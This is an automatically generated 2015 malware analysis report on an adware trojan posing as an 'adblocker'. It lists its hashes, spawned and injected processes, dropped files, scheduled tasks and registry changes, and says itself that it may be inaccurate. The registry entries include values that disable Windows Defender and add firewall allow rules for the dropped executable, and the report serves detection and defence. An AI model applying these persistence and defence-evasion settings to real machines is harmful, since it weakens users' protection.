Gen.Variant.Adware.PennyBee.6_fe4e0a2705

by malwarelabrobot on September 9th, 2015 in Malware Descriptions.

Gen:Variant.Adware.PennyBee.6 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


This description has been generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: fe4e0a2705e5b15832079b300c83de5e
SHA1: ba8dccde84f93dd9fcf6f0de672a435172879f83
SHA256: abbe5a0f3bdbc2aa4f5bcbc9047c7a68c4e12dcc9857f7c1af3892aa95b54871
SSDeep: 24576:NYShsisFlQ3IFz7ZimL826AhX5C9vcxIfOm4ue2qgFhX88Fk9qfDdeIZXGa5RMG:bsiAW3Ix7ZiahJC9kxmOmDR7EqLdeIZj
Size: 1541210 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-06-07 00:41:54
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:924
taeako.exe:900
taeako.exe:2352
taeako.exe:212
taeako.exe:972
taeako.exe:948
taeako.exe:2980
taeako.exe:2644
taeako.exe:1536
taeako.exe:544
taeako.exe:436
taedko.exe:1988

The Trojan injects its code into the following process(es):

taeako.exe:372
tae3ko.exe:1932
taedko.exe:1604
dag17797.exe:552

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.dll (39329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\utaujte.js (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (101002 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\adblocker_installer__1441686123.txt (16441 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (4 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3kod.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\khkiaff.js (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\TrayIcons\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (569 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6kod.dll (39329 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\utils.exe (9527 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewko.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeadko.bnp (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\khkiaff.js (1856 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\utaujte.js (1447 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewdko.bnp (6584 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\jquery4toolbar.js (3312 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (0 bytes)

The process taeako.exe:212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (574 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (1156 bytes)

The process taeako.exe:372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
%WinDir%\Tasks\Tempo Runner tae6ko.job (8112 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (1528 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (2704 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (920 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (3072 bytes)

The Trojan deletes the following file(s):

%WinDir%\Tasks\Tempo Runner tae6ko.job (0 bytes)
%WinDir%\Tasks\Tempo Runner tae3ko.job (0 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (0 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (0 bytes)

The process taedko.exe:1604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\lgv[1].js (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cmp_ext[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\obbgint[1].js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58 (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ammbg[1].js (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6 (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cxeappconf[1].js (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getcc[1].php (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8 (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\v1[1].htm (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ammapp[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_gb (32 bytes)

The process taedko.exe:1988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\loader[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_expire (13 bytes)

The process dag17797.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\SecondResult.txt (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_422.html (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsDialogs.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd4.tmp (0 bytes)

Registry activity

The process %original file name%.exe:924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"Publisher" = "adblocker"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\fe4e0a2705e5b15832079b300c83de5e\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayVersion" = "1.1.0.31"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"SetupType" = "71070"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayIcon" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayName" = "adblocker"
"UninstallString" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe /ga=1503 /ai=121 /bi=0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 9F 63 AB DB 79 36 DA 6C 40 E6 3A F2 0F 8F B5"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\fe4e0a2705e5b15832079b300c83de5e\DEBUG]
"Trace Level"

The process taeako.exe:900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 37 C8 BF 8A 63 02 AF 3F D8 06 6E 13 2C 9C 27"

The process taeako.exe:2352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 13 E6 58 A6 E0 D4 77 FB 5D 8E 1E C5 21 CF AA"

The process taeako.exe:212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\taeako\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"InstallDate" = "140526"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 4B D6 B5 AE 9F B4 F3 2E 8A C5 85 0C 1A FD 33"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan adds the executable file of the process it runs in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"

Adds a Windows Firewall rule that allows any network activity for the executable:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\taeako\DEBUG]
"Trace Level"

The process taeako.exe:972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 38 B2 83 50 39 6E C0 71 A4 69 D3 07 67 CE 28"

The process taeako.exe:948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 7B C0 15 9B 16 8B 6E 90 07 D7 4A 29 ED 3A AF"

The process taeako.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 3F 72 81 8B 2A B7 25 C3 9B 28 0C A7 2E 9E 33"

The process taeako.exe:2644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB BF 99 9A 97 CA 44 28 A6 55 D2 69 96 B0 02 7C"

The process taeako.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 74 BF C4 76 F0 2C DA 5B 97 7A 2B 1F 99 0F 21"

The process taeako.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 6D 06 43 63 FE 46 50 E7 CA FD 00 67 AD E6 CD"

The process taeako.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 90 A8 A8 34 93 CE AF 65 94 DA 06 09 05 47 93"

The process taeako.exe:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 CD BE 57 BF 26 58 D1 B5 5E 09 03 26 10 47 F9"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\121_31]
"AMMDCS" = "1503"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process tae3ko.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 26 9A 4F 50 C8 5E 2F 44 B0 5B AD C9 05 D6 1A"

The process taedko.exe:1604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"AAD4DBA9766467aob23" = "60000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"S132B7B8F1DC15ob23" = "12"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

